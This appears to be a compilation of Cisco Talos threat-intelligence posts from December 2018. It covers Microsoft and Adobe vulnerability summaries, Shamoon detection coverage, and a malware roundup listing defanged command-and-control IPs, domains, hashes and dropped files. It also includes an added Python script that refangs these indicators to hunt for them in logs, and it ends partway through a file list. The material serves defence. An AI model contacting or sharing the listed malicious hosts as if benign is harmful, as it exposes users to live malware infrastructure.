Microsoft disclosed nine critical vulnerabilities this month, which we will highlight below.

CVE-2018-8583, CVE-2018-8617, CVE-2018-8618, CVE-2018-8624 and CVE-2018-8629 are all memory corruption vulnerabilities in the Chakra scripting engine that could allow an attacker to execute code on the victim machine remotely. All of the bugs lie in the way the scripting engine handles objects in memory in the Microsoft Edge web browser. An attacker could exploit these vulnerabilities by tricking a user into visiting a web page using Microsoft Edge, or by tricking them into clicking on specially crafted content on other sites that accept user-created content.

CVE-2018-8540 is a remote code injection vulnerability in the Microsoft .NET framework. An attacker can exploit this flaw by passing a specific input to an application utilizing vulnerable .NET methods. If successful, the attacker could take control of an affected system.

CVE-2018-8626 is a remote code execution vulnerability that exists in Windows DNS servers when they fail to properly handle requests. An attacker could run arbitrary code on an affected system if they exploit the vulnerability by sending malicious requests to a Windows DNS server. Windows servers that are configured as DNS servers are susceptible to this vulnerability.

CVE-2018-8631 is a remote code execution vulnerability in Internet Explorer. The bug lies in the way the web browser accesses objects in memory. An attacker could exploit this bug by tricking a user into visiting a specially crafted, malicious web page in Internet Explorer. If successful, the attacker could execute arbitrary code in the context of the current user.

CVE-2018-8634 is a memory corruption vulnerability in Microsoft Edge that exists when the web browser improperly handles objects in memory. An attacker who successfully exploits this flaw by tricking a user into visiting a malicious, specially crafted web page could gain the ability to execute arbitrary code on the machine in the context of the current user.

Important vulnerabilities

This release also contains 29 important vulnerabilities, eight of which we will highlight below.

CVE-2018-8597 and CVE-2018-8636 are remote code execution vulnerabilities in Microsoft Excel that exist when the software fails to properly handle objects in memory. An attacker can exploit these bugs by tricking the user into opening a specially crafted Excel file, either via the web or as an email attachment. If successful, the attacker could gain the ability to execute arbitrary code on the system in the context of the current user.

CVE-2018-8587 is a remote code execution vulnerability in Microsoft Outlook that exists when the software fails to properly handle objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a specially crafted email attachment while using the Outlook client. If successful, the attacker could use a specially crafted file to perform actions in the security context of the current user. For example, the file could act on behalf of the logged-on user with the same permissions as the current user.

CVE-2018-8590 is a remote code execution vulnerability in Microsoft Word that exists when the software fails to properly handle objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a malicious, specially crafted Word document, either via email, the web, or another vector.

CVE-2018-8619 is a remote code execution vulnerability that exists when the Internet Explorer VBScript execution policy improperly restricts VBScript in certain scenarios. An attacker could use this vulnerability to run arbitrary code with the permissions of the current user. A user could trigger this vulnerability if they visited a specially crafted web page using Internet Explorer.

CVE-2018-8625 is a remote code execution vulnerability in the VBScript engine. The vulnerability could corrupt memory in such a way that an attacker could execute code in the context of the current user. An attacker could trigger this flaw by tricking the user into visiting a specially crafted website on Internet Explorer. Additionally, they could embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine.

CVE-2018-8628 is a remote code execution vulnerability in Microsoft PowerPoint that lies in the way the software processes objects in memory. An attacker could exploit this bug by tricking the user into opening a specially crafted, malicious PowerPoint file, which would eventually grant them the ability to execute code remotely in the context of the current user. The Preview Pane is not an attack vector for this vulnerability — the user must open the file in PowerPoint.

CVE-2018-8643 is a remote code execution vulnerability that exists in the way the scripting engine handles objects in memory in Internet Explorer. An attacker could exploit this bug by tricking a user into visiting a specially crafted web page in Internet Explorer. Additionally, they could embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine. If successful, the attacker could then corrupt memory in such a way that they could execute arbitrary code in the context of the current user.

The other important vulnerabilities in this release are:

Coverage 

In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort rules: 45142, 45143, 48509, 48510, 48513 - 48520, 48531 - 48534, 48559, 48562

Vulnerability Spotlight: Adobe Acrobat Reader DC text field remote code execution vulnerability

Aleksandar Nikolic of Cisco Talos discovered this vulnerability.

Executive summary

Adobe Acrobat Reader DC contains a vulnerability that could allow an attacker to remotely execute code on the victim’s machine. If the attacker tricks the user into opening a specially crafted PDF with specific JavaScript, they could cause heap corruption. The user could also trigger this bug if they open a specially crafted email attachment.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Adobe Acrobat Reader DC text field value remote code execution vulnerability (TALOS-2018-0704/CVE-2018-19716)

Adobe Acrobat Reader supports embedded JavaScript in PDFs to allow for more user interaction. However, this gives the attacker the ability to precisely control memory layout, and it poses an additional attack surface. If the attacker tricks the user into opening a PDF with two specific lines of JavaScript code, it will trigger an incorrect integer size promotion, leading to heap corruption. It’s possible to corrupt the heap to the point that the attacker could arbitrarily execute code on the victim’s machine.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that Adobe Acrobat Reader DC 2019.8.20071 is impacted by this vulnerability.


Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48293, 48294

Cisco Coverage for Shamoon 2 & 3

Update Dec. 14, 2018 10:30 CST: Added new Shamoon 3 IOCs

Shamoon is a type of destructive malware that has been previously associated with attacks against various organizations in the oil and gas industry that we've been tracking since 2012. A new variant of this threat, identified as Shamoon 2, has been used against several compromised organizations and institutions. Throughout 2017, Talos observed an increase in Shamoon 2 activity and responded to ensure our customers remained protected. 

On Dec. 10, Talos observed a new Shamoon 3 variant (c3ab58b3154e5f5101ba74fccfd27a9ab445e41262cdf47e8cc3be7416a5904f) that was uploaded to VirusTotal. While it is unclear where this sample came from, it shares many of the characteristics of the Shamoon 2 variant. Talos once again responded to ensure our customers are protected with all the existing coverage mechanisms. Additionally, Talos will continue to monitor for new developments to ensure our customers remain protected.

Propagation

Shamoon 2 has been observed targeting very specific organizations and propagating within a network via network enumeration and the use of stolen credentials. Some of the credentials are organization specific from individuals or shared accounts. Other credentials are the default accounts of products used by the targeted customers.

Coverage

Coverage for Shamoon 2 is available through Cisco security products, services, and open source technologies. Note that as this threat evolves, new coverage may be developed and existing coverage adapted or modified. As a result, this post should not be considered authoritative. For the most current information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules

  • 23893
  • 23903
  • 23905-23933
  • 24127
  • 40906

ClamAV Signatures

  • Win.Dropper.DistTrack-*
  • Win.Trojan.DistTrack.*
  • Win.Malware.DistTrack.*

AMP Detection

  • W32.GenericKD:Malwaregen.20c3.1201
  • W32.Malwaregen.19nb.1201
  • W32.47BB36CD28-95.SBX.TG
  • W32.Malwaregen.19nb.1201
  • W32.Generic:Malwaregen.20c3.1201
  • Win.Malware.DistTrack
  • W32.128FA5815C-95.SBX.TG
  • W32.C7FC1F9C2B-95.SBX.TG
  • W32.EFD2F4C3FE-95.SBX.TG
  • W32.010D4517C8-95.SBX.TG
  • Win.Malware.DistTrack.Talos

Other Mitigation Strategies

Recent Shamoon 2 activity serves as a good reminder that users and organizations need to have a comprehensive disaster recovery plan. No one can say for certain whether you will be targeted by destructive malware, but we can say with 100% certainty that all drives fail. Without a proper system to back up and restore your data, you risk permanently losing it. Ensuring your assets are properly backed up and can be quickly restored is critical should a system become compromised by Shamoon, ransomware or other destructive malware and require a complete restoration.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

The Network Security protection of IPS and NGFW has up-to-date signatures to detect malicious network activity by threat actors.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

IOCs


Shamoon 2

4919436d87d224f083c77228b48dadfc153ee7ad48dd7d22f0ba0d5090b5cf9b
5475f35363e2f4b70d4367554f1691f3f849fb68570be1a580f33f98e7e4df4a
01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc
c7f937375e8b21dca10ea125e644133de3afc7766a8ca4fc8376470277832d95

Shamoon 3

Threat Roundup for Dec. 7 to Dec. 14

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Dec. 07 and Dec. 14. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with each cluster. The hash lists in this blog post are limited to 25 per threat. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.
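The IOC blocks below are published defanged (dots written as "[.]") and mixed with infrastructure that nearly any sandbox run touches, so using them for hunting takes two steps the post leaves implicit: refang the values, then weight hits so that a single low-signal match is not treated as a finding. The following is an added example, not code from the Talos post or any Talos tool. IOC_TEXT reuses a handful of defanged values from the Doc.Malware.Dkvn-6781497-0 and Txt.Malware.Nemucod-6780827-0 sections below; the log format, hostnames, timestamps and the LOW_SIGNAL list are constructed for the demo.

```python
"""Refang Talos-style defanged IOCs and hunt for them in DNS/proxy logs.

Added example, not code from the Talos post. IOC_TEXT reuses a few defanged
values from the roundup; LOG_LINES (hostnames, timestamps and the log format
itself) are constructed for this demo and do not come from any real incident.
"""
import re
from collections import defaultdict

DEFANGED_DOT = re.compile(r"\[\.\]")
IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")

# Hosts that nearly every Office/sandbox run touches (XML schema hosts, etc.).
# A hit on one of these alone is noise; the roundup's own caveat that one IOC
# does not indicate maliciousness applies doubly here. Constructed list.
LOW_SIGNAL = {"www.w3.org", "api.w.org", "gmpg.org"}

# A few entries copied from the roundup, in its own defanged bullet format.
IOC_TEXT = """\
IP Addresses contacted by malware. Does not indicate maliciousness
  • 45[.]40[.]183[.]1
  • 185[.]104[.]28[.]132
Domain Names contacted by malware. Does not indicate maliciousness
  • www[.]w3[.]org
  • enthos[.]net
  • CLARAMUSICA[.]COM
  • N/A
"""

# Constructed log: <timestamp> <host> <dns|http> <queried name or destination IP>
LOG_LINES = [
    "2018-12-12T10:01:02Z ws-017 dns www.w3.org",
    "2018-12-12T10:01:05Z ws-017 dns enthos.net",
    "2018-12-12T10:01:06Z ws-017 http 45.40.183.1",
    "2018-12-12T10:02:10Z ws-042 dns www.w3.org",
    "2018-12-12T10:03:00Z ws-099 dns claramusica.com",
]


def refang(ioc: str) -> str:
    """'45[.]40[.]183[.]1' -> '45.40.183.1'. Domains are lowercased so the
    roundup's mixed-case entries (CLARAMUSICA[.]COM) match real DNS logs."""
    value = DEFANGED_DOT.sub(".", ioc.strip())
    return value if IPV4.match(value) else value.lower()


def parse_ioc_block(text: str) -> dict:
    """Pull the bullet entries of a roundup IOC block into
    {"ip": set, "domain": set}; 'N/A' placeholders are skipped."""
    iocs = {"ip": set(), "domain": set()}
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("•"):
            continue
        value = refang(line[1:])
        if value.upper() == "N/A":
            continue
        iocs["ip" if IPV4.match(value) else "domain"].add(value)
    return iocs


def hunt(iocs: dict, log_lines: list) -> dict:
    """Match each log line against the IOC sets. Per host, return the distinct
    IOCs seen, a score that ignores LOW_SIGNAL hits, and a verdict: two or more
    independent indicators on one host is worth a look; one is a lead, not a
    finding; only low-signal hits is noise."""
    seen = defaultdict(set)
    for line in log_lines:
        _ts, host, kind, value = line.split()
        bucket = "domain" if kind == "dns" else "ip"
        value = value.lower() if bucket == "domain" else value
        if value in iocs[bucket]:
            seen[host].add(value)
    report = {}
    for host, hits in seen.items():
        score = len(hits - LOW_SIGNAL)
        verdict = "investigate" if score >= 2 else ("lead" if score == 1 else "noise")
        report[host] = {"hits": sorted(hits), "score": score, "verdict": verdict}
    return report


if __name__ == "__main__":
    for host, row in hunt(parse_ioc_block(IOC_TEXT), LOG_LINES).items():
        print(f"{host}: {row['verdict']} score={row['score']} hits={row['hits']}")
```

Scoring by distinct indicators per host rather than by raw hit count is deliberate: a workstation that resolves the same benign schema host a hundred times should not outrank one that touched both a dropper domain and the IP it was served from.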

The most prevalent threats highlighted in this roundup are:

  • Doc.Malware.Dkvn-6781497-0
    Malware
    This is a trojan that drops a malicious executable and executes PowerShell commands. It can be used as a downloader or a dropper for Emotet.
     
  • Txt.Malware.Nemucod-6780827-0
    Malware
    Nemucod is a trojan that executes ransomware on a victim's computer.
     
  • Win.Virus.Parite-6780568-0
    Virus
    Parite is a polymorphic file infector. It infects executable files on the local machine and network drives.
     
  • Xls.Downloader.Jums-6779285-0
    Downloader
    Jums is a trojan that spawns a PowerShell process, then creates and executes a malicious executable. It collects a large amount of system information and reaches out to a remote server after installation.
     
  • Win.Virus.Sality-6780277-0
    Virus
    Sality is a file infector that establishes a peer-to-peer botnet. Although it has been prevalent for more than a decade, we continue to see new samples that need some attention to keep detection consistent. Once a Sality client bypasses perimeter security, its goal is to execute a downloader component capable of executing additional malware.
     
  • Doc.Malware.Powload-6775735-0
    Malware
    Powload is a malicious document that uses PowerShell to download malware. This campaign is currently distributing the Emotet malware.
     
  • PUA.Win.Trojan.Hupigon-6776762-0
    Trojan
    Hupigon is a trojan that installs itself as a backdoor on a victim's machine.
     

Threats

Doc.Malware.Dkvn-6781497-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PRINT\PRINTERS\Canon PIXMA MG2520\PrinterDriverData
Mutexes
  • Local\10MU_ACB10_S-1-5-5-0-57527
  • Local\10MU_ACBPIDS_S-1-5-5-0-57527
  • Local\WinSpl64To32Mutex_e162_0_3000
IP Addresses contacted by malware. Does not indicate maliciousness
  • 45[.]40[.]183[.]1
  • 66[.]198[.]240[.]4
  • 103[.]18[.]109[.]178
  • 192[.]169[.]140[.]162
  • 209[.]151[.]241[.]184
Domain Names contacted by malware. Does not indicate maliciousness
  • enthos[.]net
  • shofar[.]com
  • shawktech[.]com
  • thecreativeshop[.]com[.]au
  • burlingtonadvertising[.]com
Files and/or directories created
  • %UserProfile%\Documents\20181212
  • %LocalAppData%\Temp\109.exe
  • %SystemDrive%\~$6889120.doc
  • %LocalAppData%\Temp\2vuqj0ws.zbs.ps1
  • %LocalAppData%\Temp\4ezh4c4j.esn.psm1
  • %LocalAppData%\Temp\CVR95F8.tmp
  • %LocalAppData%\Temp\~DF78CDE2D9B1588659.TMP
File Hashes
  • 0421be0b17b64e14118e01ec412f1721bb9079630a004ff7e846f954c2355538
  • 18bf25020d301b1b22e316d2a6909a40c8dcea59fb04057d58346bdb58a7503c
  • 24ee6e8bd38b5bef0c3db97c8cfdf03a38e442b624a1f7f731fb6e7c2989d6ea
  • 2d50cc5a4ac493e5578038e8f892f9df5e134114ed6e9840089d9f32b8f28440
  • 2ed82969c7fb23e18f1f9b0ab519124438129dc7f2530ee24604397b9c1250de
  • 3e662508b29b2ef40092655a69073c220770a8306c0b17773059e07fe1a712b3
  • 5ed274afe729b6b92cbb4446fa3f4f6130c8e20b3a903b13d7691d2006d2e72d
  • 6d34270f0aeb0fbdb270e47866413a299a1deb54e7c4dd6b785a0ca7f2e0c73a
  • 727afa31d97e874e3d2a3c11870a5b1b65ecda8905e3c97cbddb31a9fbfaf543
  • 74201328ff459bf6412c7dbbcc0866f06f7ccc2b2dc7a1c4bc429518a85fee89
  • 827c0012de03d21f84442e7dd0ea1d0a25f40b0e2982fab1695f935aaf471bd0
  • 91da45beb83ea575f50ff8d9d6dcad7d9efa437b7e337006b2cc8ed2f6d4faf2
  • ac280877daecf65f6570233d76c249caa8eaa52cb5ba31fc3e1611d45c8d0454
  • aeef6e04c09d5f051f94a5c6545cf4228670954274ab97f1c85e7c78f1e6f116
  • af8a10416ae6e32a6250cf03d8c3ba37933903accf649e9feb4f636c17ae2b54
  • c26e6b57799f13d5d8353834bd721b304a15a7bbbb238995dbf98c4a26b71be3
  • d77fdb097fb549034a72f67236bf4c744012ff71e43f37cd89e373645fc26288
  • da7ac63e1a221dba1fb4d1ee743537b985fde34ad9bbc372fcc07a184ce683a7
  • db37c4693eebc0f518bbd7e5707ec3abd4c2633e86b2ca92b9e34b21864a310b
  • dd57c3ea2596874a51b13fe84d3dc328365af06bd0f50eb328819bc970766fde
  • de2c3b81106ab89e0dd2c7d654b0a161e2227bbaafcd1b1860c387c7b67be69d
  • e2ae044f486dba0d5005295ffa9100411a6225fff6c061da69225b6c50834a69
  • e4269fcfda0fe8ef8872dbf51aec6dc9cbb18ad4eae281700be24f563164026d
  • e71d9efea3a62cc265938bac1c53aa96f8729609cabfc6df4c66d5c5e9c016fe
  • eb2bb764fb66c7c5509c7ce50ee3e0c61a675867f85ecdae78ad547b0ac72760

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella, Malware


Txt.Malware.Nemucod-6780827-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 144[.]217[.]147[.]190
  • 201[.]187[.]101[.]156
  • 185[.]104[.]28[.]132
Domain Names contacted by malware. Does not indicate maliciousness
  • www[.]w3[.]org
  • api[.]w[.]org
  • gmpg[.]org
  • ikincielesyaevi[.]com
  • www[.]ikincielesyaevi[.]com
  • www[.]gulfshorecooling[.]com
  • elemaroregon[.]com
  • gpconstructie[.]be
  • cvcpdx[.]com
  • www[.]chaffinww[.]com
  • workwithcore[.]com
  • phoenixconstruction[.]com
  • www[.]laneexteriorsllc[.]com
  • autosorno[.]cl
  • cleanairtx[.]com
  • www[.]ohiostatestucco[.]com
  • www[.]teknikinc[.]com
  • GOESTOM[.]COM
  • CLARAMUSICA[.]COM
  • claramusica[.]com
  • goestom[.]com
Files and/or directories created
  • \ROUTER
  • \DAV RPC SERVICE
  • \Device\Null
  • \Win32Pipes.00000370.00000001
  • \Win32Pipes.00000370.00000002
File Hashes
  • 029cfbcb0e44965e253979458652858b3eabfff38be5e7648c8b82f475233345
  • 0cb706b11174c5a7fd08e70308d1ff84447d6e65a487b146846d5150931a8970
  • 17304c0d1c57c83a58b5b1df2e6fe5b0b2a58634d1cebbd83ce8bd5533fea584
  • 215953913e52f0e071dd8244d598a7c34367d03558599f7b9c824d916f60186a
  • 2c93a65ec63e429b8e8a971dbaea069829763235daeb26a5f24adc69debbff71
  • 38848aedc1194c09d6eeb88ef04ba56aee22e0f579284a63b12d896fdb0d4831
  • 3bf5629a35700582d0abbdf8aa1c97c34c4f2fd933de6f70569d2b3103f6379e
  • 4d85b12eddc09b1cfdfd8d580ecca6d724dd66b91d8866f707aa91cb50c7fbd7
  • 5247f2722b8623e95f8d10cd79d0fbe3e96fe8f0527d3b9be480d2640f02b160
  • 52cecc5d101a881b137c07143268217dacf145dab73d50e0e8da318000f5b5e0
  • 59109d8c01b76ebe171dc28cbe37ceb393846d0ed240f54a14eb9014588c748d
  • 5c2d33368a931651ea426f3ed037185d99c7c3bb28d5430413a2c93b4f525428
  • 66b09b100ecc40609965a74c90e9553457d730bc8b4c5ee95b2f2089dd0aba3b
  • 7d9fcffa70fec088cda7c4095740599a45a710ce38a66fa9e13f0dfb7bc43b3b
  • 8afdadaa66d58e386411755871ff91858bb99016e22e67de3ce3cc63ea35c4a8
  • 918312a6b9b634f27089520d15dc15966a25bd719627962d756f370949adb152
  • af0ab34d44410fab4cfb8c24dfc0240e508de5e31a0eb567c0533344eb9c92fe
  • de5e00e84554eb352985d85146eb696be474c1f5b97a764052fc0575fec8ad13
  • e29d601569f5197e631275c5391a273058ab2aca0473dedf148177516de1e7c5
  • f40f059bad77bf7297b3783af078e8febf11650709294e69a9c198c711a87386

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella, Malware

Win.Virus.Parite-6780568-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • InstallLauncher_4541454E-9FFA-4246-835D-3F49EFA91F6C
  • \BaseNamedObjects\InstallLauncher_4541454E-9FFA-4246-835D-3F49EFA91F6C
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and/or directories created
  • %LocalAppData%\Temp\ejp5C31.tmp
File Hashes
  • 03b06a1f568e2985a763c155c14c2a9c4b7b18471d91bf2164ad44350d4353d6
  • 0478b98235d5c49bc7facddce8f912a4ec2b58c33b4947922927e139b9efba1f
  • 11ec64be12c389f32640d9803deffa8f93b9457572c71f36df3fe0df4e1f6a8b
  • 17527e946bbac0ed6c69fe1b97d4d16a8d2ea20811898ee471bf0f9e4377d3e7
  • 250e929dc833074872defd3ca65b2ccf6cf9b32ed6f6cfca07a66767e48db6d4
  • 2a4b55983c456e9ea14115378397e67df37d89a28818cb3f557b8afbb3e086e3
  • 2f6a2d0728cad1403d52a3dfc6db10011fa215f6f5b8272e5c4699e1a68afaf2
  • 318722e8243edf25c73800569cc1d78c8a6f62aa382f484116c0197d3cfc6578
  • 3858721e1297e627247f17ebf44ff0502981481af3c04ebb6c76bafda0db2c6d
  • 3aea0bd31f0d86f9c5a5035828dea6e42cb0646c204bb866c71528bd1f714e7f
  • 55e263c3206ceed9776d0d0b6015cc5e7c444bed6c68a66766d34998fb744ff1
  • 5b6e1419168ecd9ead5800273b1c63fa6420455b1ac2c85be430d5e976f4a104
  • 69528927f100ff5c7b92e6898f33e94768953fceed5ffb71fce02dc6acb9ca56
  • 6efd875b023b1289020e7d2acd02526d61592f4dd5e1b35e2ca04eeae162507b
  • 78af109d92ce244c02b1530f7ae65f2c9958e34e239788caf3ee94115ad36d47
  • 8240517c639812a704d439035b22fe685b3b905bb376776c4adcc264862675e7
  • 8e170f44cd0e49ad850ffbd244ad755d1b0b7b91051308ed18c049a5e6068acc
  • 8f6c73d10c4c5f1ee2758f80bbee0e2700978b34ec74b83296ec9e3a403e81db
  • 94aad46d563c9f5a46bc1e1316d638f7e96ab4ac07b7925510644768504c9d1d
  • 9d818507ca3222b5f1f471ae1c4338de9227e95b12ac838eed1d68550019aa22
  • c1b87392cafff0a07c0dedfa59da2936a371bf2e40855c9b1a1d6bf66903ef12
  • c56b47185d4176e620a12ba8f752a67d4e264919127970f0f8bb567f5f778511
  • d9cc0b9443f5ec4f84070165ddd08d3def72662df47b52795b793725547816b3
  • dafa195b9f7cf1b3d249ccc6e40bbc181aa54878faf3411b78ccea85e4e4f255
  • e77216030291a46d69d4bdf5725dc052d16e6ed7d6485b85cfcc8c4b88bc4313

Coverage

Screenshots of Detection: AMP, ThreatGrid, Malware

Xls.Downloader.Jums-6779285-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • Global\552FFA80-3393-423d-8671-7BA046BB5906
  • Local\ZonesCacheCounterMutex
  • KYIMEShareCachedData.MutexObject.Administrator
  • KYTransactionServer.MutexObject.Administrator
IP Addresses contacted by malware. Does not indicate maliciousness
  • 192[.]185[.]16[.]22
  • 192[.]254[.]237[.]11
Domain Names contacted by malware. Does not indicate maliciousness
  • www[.]aaaplating[.]com
  • weighcase[.]co[.]uk
Files and/or directories created
  • %LocalAppData%\Temp\VBE\MSForms.exd
  • %AppData%\Microsoft\Excel\XLSTART
  • %UserProfile%\Documents\20181119
  • %TEMP%\tmp907.bat
  • %LocalAppData%\Temp\tmp016.exe
  • %LocalAppData%\Temp\CVR4F0E.tmp
  • %LocalAppData%\Temp\twaibr0n.00s.ps1
File Hashes
  • 199f1eec8413168be6418ace60cfe760d858350ebef3605aa91d47338b881e0c
  • 1f444338e19212dfe5f597ceb3b55f06a8b927a342ce50d0c5ae4452d4999e80
  • 49fbb593eb1418ecbbefd3ac0529ccf1ed2ef64e20927a5e0379f99ec9fd0c9b
  • 5ac6fb69b5c55ec6419b89e22ce7fd873d11d263ae2eda9ff85e8eda10b20444
  • 644f8f3822eb0c5435ffbec711a0b2821e1fa050ca10c837a62c02a9df814d9d
  • 77f27841d4263d1ed6ba59267d78a454c9a2a3383ee3f1a2a5ddbed4e835dd06
  • 83cf5c7623bc92966e02b594bb41ab3896b1ffaae748d7cc9b4331f3f435f171
  • 9a422430a9443b77b5959847657ec411736e180b30563b5066d1ea0c7b22633e
  • 9bfd539bb55f7a7a5a8df5a0e3ecd87157ecd87675915ac01ca6ce62a3402872
  • 9dbd2fc30b9c22fb03df72eb46ea83af41449bb6054cdf8cd83e5520de633641
  • a46e400bbf7b921a5b2e131ac3c8bf10506569466ad3fff99381c411e585192d
  • a6043595251b41b336ca8bc2ccc05bc2bf2781274c1893d6943141a4bd3cf637
  • a6d95c0eac0c0b584faa37c1e21ee5baad74e227685275899a9d8c5ac2806b9d
  • be6ac030af25e2044cf8889d747fa170bcbb10a325a3f05f67194379f86375ca
  • c7c3ded9554e8ca38031ab080c1ed9d775a20ac928eaded8d24fb325d7c6be1f
  • cba2b5d0949ff517c40f74cf166b7c363dbf54bda30d4e8432f31da674a78b9c
  • e4fcc415e1f7cec20991a6e5612c7706c1187e23ecea5115fbeea824c9b06c14
  • efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081
  • f495fc57c7bd8311cee17ea6dc15c953d21c5fd97147e632a509b07217855501

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella, Malware

Win.Virus.Sality-6780277-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • uxJLpe1m
  • wininit.exeM_320_
  • winlogon.exeM_356_
  • wudfhost.exeM_1644_
  • \BaseNamedObjects\uxJLpe1m
  • \BaseNamedObjects\csrss.exeM_528_
  • \BaseNamedObjects\services.exeM_664_
  • \BaseNamedObjects\lsass.exeM_676_
  • \BaseNamedObjects\svchost.exeM_1008_
  • \BaseNamedObjects\smss.exeM_364_
  • \BaseNamedObjects\spoolsv.exeM_1560_
  • \BaseNamedObjects\winlogon.exeM_552_
  • \BaseNamedObjects\ctfmon.exeM_204_
  • \BaseNamedObjects\svchost.exeM_912_
  • \BaseNamedObjects\userinit.exeM_1372_
  • \BaseNamedObjects\svchost.exeM_832_
  • \BaseNamedObjects\jqs.exeM_1736_
  • \BaseNamedObjects\rundll32.exeM_948_
  • \BaseNamedObjects\explorer.exeM_1456_
  • \BaseNamedObjects\svchost.exeM_1116_
  • \BaseNamedObjects\wmiprvse.exeM_440_
  • wmiprvse.exeM_776_
  • \BaseNamedObjects\wmiadap.exeM_3280_
  • \BaseNamedObjects\356677150.exeM_1408_
  • \BaseNamedObjects\wmiprvse.exeM_1688_
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and/or directories created
  • \??\E:\autorun.inf
  • %System32%\drivers\lhlnn.sys
  • %SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@cargocrystal[1].txt
  • %SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@cargocrystal[2].txt
  • %SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@samayer[1].txt
  • %LocalAppData%\Temp\wingqijig.exe
  • %SystemDrive%\okieu.exe
  • \??\E:\mshy.pif
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\augx.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bvwf.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ceohbt.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cevjx.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dkgn.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\easrrv.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gekhk.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\glya.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hpqd.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ixway.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jbccl.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jhrim.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jvuj.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kdpw.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kwih.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lmbonl.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lpig.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ltyyd.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mqsr.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mskjgp.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mslmw.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ndcdl.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\niut.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nixbf.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nygs.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\olsit.exe
